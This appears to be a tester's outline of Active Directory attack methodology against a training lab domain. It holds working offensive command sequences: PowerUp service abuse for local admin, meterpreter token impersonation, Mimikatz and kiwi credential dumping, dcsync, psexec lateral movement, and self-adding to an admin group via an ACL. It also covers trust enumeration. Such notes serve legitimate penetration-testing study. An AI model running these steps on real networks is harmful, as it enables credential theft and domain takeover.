AD Testing Methodology
Network-Level Attacks
This is problematic, maybe move this into the 'Red Teaming' area and focus upon moving within AD here
Network Scanning
Ranging from passive to active measures:
attacking AD features
attacking vulnerabilities common in AD
- zero logon (2020)
- EternalBlue
- windows/smb/ms17_010_psexec
post AD-compromise
get local admin
PS> Invoke-AllChecks
PS> Invoke-ServiceAbuse -Name 'ALG' -UserName us\studentuser21
# logout/login, new you're local adminLateral Movement
- Kerberos Delegation
- LAPS
- gMSA
- certificate services
- mssql
- KrbRelayUp
- CI CD pipelines
- Hybrid Identities
- attack SCCM, https://github.com/subat0mik/Misconfiguration-Manager
token impersonation
-
delegation token vs. impersonate token
-
delegation is used for logging into a machine or RDP
-
impersonate are for non-interactive use
-
tool: incognito
-
meterpreter: load incognito, list_tokens -u, impersonate
-
Invoke-Mimikatz … to dump LSA
-
example
- meterpreter → smbexec
- load incogonito
- list_tokens -u → try to get into a domain admin
- rev2self (to get back to the original user)
- load kiwi
- dump stuff, dcsync, etc.
-
e.g., for dump stuff (when domain admin) - access denied: must be domain admin
- use exploit/windows/smb/psexec
- take care of x86/x64
- sysinfo, hashdump
- load incognito
- list_tokens -u
- impersonate_token domain\user
- use exploit/windows/smb/psexec
restricted groups and ACLs
PS> Get-DomainGPOLocalGroup # returns machineadmins, and uuid of gpolink
PS> Get-DomainGroupMember -identity machineadmins # shows no user
PS> Get-DomainOU -GPlink 'B78BFC6B-76DB-4AA4-9CF6-26260697A8F9' # shows OU Mgmt# get all my groups
PS> Get-DomainGroup -MemberIdentity studentuser21|select cn
# get users which are in a local group of a machine in any OU using GPO
PS> (Get-DomainOU -Identity Students).distinguishedName | %{Get-DomainComputer -searchbase $_} | Get-DomainGPOComputerLocalGroupMapping
PS> Find-GPOComputerAdmin -OUName 'OU=Mgmt,DC=us,DC=techcorp,DC=local'
# show computers per group
PS> (Get-DomainOU -Identity Students).distinguishedName | %{Get-DomainComputer -searchbase $_} | select name
# get ACL for the current user
PS> Find-InterestingDomainAcl -ResolveGUIDs |?{$_.IdentityReferenceName -match 'studentuser21' }
PS> Find-InterestingDomainAcl -ResolveGUIDs |?{$_.IdentityReferenceName -match 'studentusers' } # generic all upon supportxuser
PS> Find-InterestingDomainAcl -ResolveGUIDs |?{$_.IdentityReferenceName -match 'managers' }
PS> Get-ADGroup -Identity machineadmins -Properties Descriptionadd myself to the machineadmins:
PS> Add-ADGroupMember -Identity MachineAdmins -Members studentuserx -Verbose
# connect to the machine
PS> $usmgmt = New-PSSession us-mgmt
PS> Enter-PSSession $usmgmtattacking systems
- kerberoasting
- AS-REP
- print nightmare (2021)
- ADCS and PetitPotam NTLM Relay into Golden Ticket
- 7_exploiting AD services
cross-domain/forests attacks
- domain trust objects
- direction of trust is inverse to the “direction of access”
- if domain a trusts domain b, users from domain b can access resources in domain a
- parent-child trust is always two-way transitive
- tree-root trust is always two-way transitive
- external trust: one-way or two-way, nontransitive
- forest trust: one-way or two-way, nontransitive
PS> (Get-ADForest).Domains
# intra-forest domains
PS> Get-ADTrust -Filter * | select Direction, Name
# trusts
PS> Get-ADTrust -Filter 'intraForest -ne $True' -Server (Get-ADForest).Name | select direction,name,SIDFilteringForestAware,Sidfilteringquarantined
# external trusts
PS> Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server us.techcorp.local # external trusts- repeat this for all found domains and trusts
The following should list more, use to double-check:
PS> Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
# Find (foreign) groups in other domains
PS> Get-DomainForeignGroupMember -Domain <target.domain.fqdn>